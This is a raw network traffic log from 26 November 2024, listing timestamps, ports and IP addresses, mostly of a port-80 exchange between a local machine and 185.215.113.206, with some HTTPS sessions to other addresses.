Nov 26, 2024 00:25:47.276663065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.276726961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.276756048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.276804924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.277942896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.277955055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.277990103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.278002024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.279048920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.279103994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.279144049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.279325008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.280092001 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.280143976 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.280181885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.280255079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.280272007 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.280283928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.280379057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.281364918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.281435966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.281474113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.281697989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.282841921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.282852888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.282933950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.283699036 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.283731937 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.283801079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.283823013 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.283871889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.283935070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.283987045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.284967899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.284980059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.285043955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.286106110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.286267042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.286303997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.286343098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.286776066 CET	443	49874	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:47.287169933 CET	49874	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:47.287180901 CET	443	49874	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:47.287237883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.287327051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.287463903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.287547112 CET	443	49874	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:47.287558079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.288060904 CET	49874	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:47.288130045 CET	443	49874	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:47.288527012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.288538933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.288579941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.288589954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.289881945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.289892912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.289951086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.291066885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.291078091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.291112900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.291136026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.293206930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.293217897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.293231010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.293262005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.293297052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.293301105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.293354988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.294255018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.294310093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.324819088 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.324857950 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.324956894 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.326108932 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.326122046 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.334569931 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.334592104 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.335782051 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.335800886 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.338148117 CET	49874	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:47.387465000 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.387511015 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.387607098 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.395284891 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:47.395318985 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:47.435031891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.435048103 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.435060024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.435098886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.435121059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.435173988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.436234951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.436249018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.436290026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.436323881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.437536001 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.437547922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.437594891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.438905954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.438918114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.438972950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.439332008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.439343929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.439389944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.440299034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.440367937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.440589905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.440697908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.441276073 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.441368103 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.441495895 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.441551924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.441606998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.441819906 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.441826105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.441834927 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.441850901 CET	49867	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.441855907 CET	443	49867	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.441862106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.442926884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.442939043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.442977905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.442996025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.444009066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.444022894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.444075108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.444117069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.444797993 CET	49886	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.444837093 CET	443	49886	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.445122004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.445135117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.445197105 CET	49886	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.445204973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.445368052 CET	49886	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.445378065 CET	443	49886	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.446171999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.446238041 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.446367025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.446402073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.447386980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.447453022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.447454929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.447487116 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.448539019 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.448600054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.449538946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.451054096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.452054977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.452065945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.452078104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.452089071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.452100992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.452114105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.452156067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.453531027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.453541040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.453551054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.453598976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.453635931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.455662012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.455677032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.455707073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.455719948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.455724001 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.455761909 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.456738949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.456784964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.456821918 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.456845999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.457941055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.458004951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.458167076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.458206892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.459150076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.459197998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.459249020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.459300041 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.460254908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.460381031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.460413933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.460433006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.461432934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.461505890 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.461637974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.461684942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.462649107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.462721109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.463027954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.463071108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.464018106 CET	49887	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:47.464067936 CET	443	49887	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:47.464144945 CET	49887	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:47.464574099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.464586020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.464652061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.464695930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.465292931 CET	49887	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:47.465306044 CET	443	49887	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:47.465480089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.465492964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.465536118 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.465553999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.466270924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.466281891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.466339111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.466798067 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.467360020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.467420101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.467469931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.467511892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.468626976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.468638897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.468691111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.469736099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.469791889 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.469791889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.469850063 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.469873905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.469901085 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.469903946 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.469964027 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.470150948 CET	49865	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.470164061 CET	443	49865	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.470846891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.470937967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.470948935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.470992088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.472013950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.472074032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.472116947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.472163916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.473192930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.473261118 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.473290920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.473371983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.474540949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.474555969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.474606037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.474643946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.475564957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.475608110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.475625038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.475662947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.476769924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.476779938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.476823092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.477993965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.478054047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.478076935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.478257895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.479058981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.479129076 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.479207039 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.479713917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.480277061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.480336905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.480340958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.480380058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.481539011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.481549025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.481595039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.483088017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.483098984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.483150005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.483870983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.483881950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.483936071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.484930038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.485002995 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.485035896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.485153913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.486148119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.486193895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.486197948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.486241102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.487349987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.487399101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.487462997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.487588882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.488420963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.488512993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.488586903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.488636017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.489649057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.489691019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.489712954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.489949942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.490808964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.490868092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.490905046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.491157055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.492292881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.492302895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.492346048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.493310928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.493323088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.493374109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.494445086 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.494455099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.494522095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.495467901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.495743036 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.560625076 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.560704947 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.560774088 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.561054945 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.561074018 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.561089993 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.561100006 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.564655066 CET	49888	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.564686060 CET	443	49888	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.564765930 CET	49888	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.564944029 CET	49888	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.564953089 CET	443	49888	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.583326101 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.583401918 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.583645105 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.583717108 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.583739042 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.583750010 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.583755016 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.587590933 CET	49889	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.587625980 CET	443	49889	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.587862015 CET	49889	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.588102102 CET	49889	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.588114023 CET	443	49889	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.635201931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.635215998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.635286093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.635987997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.635998964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.636071920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.639012098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.639067888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.639075041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.639086008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.639106035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.639117002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.639117956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.639127970 CET	80	49795	185.215.113.206	192.168.2.6
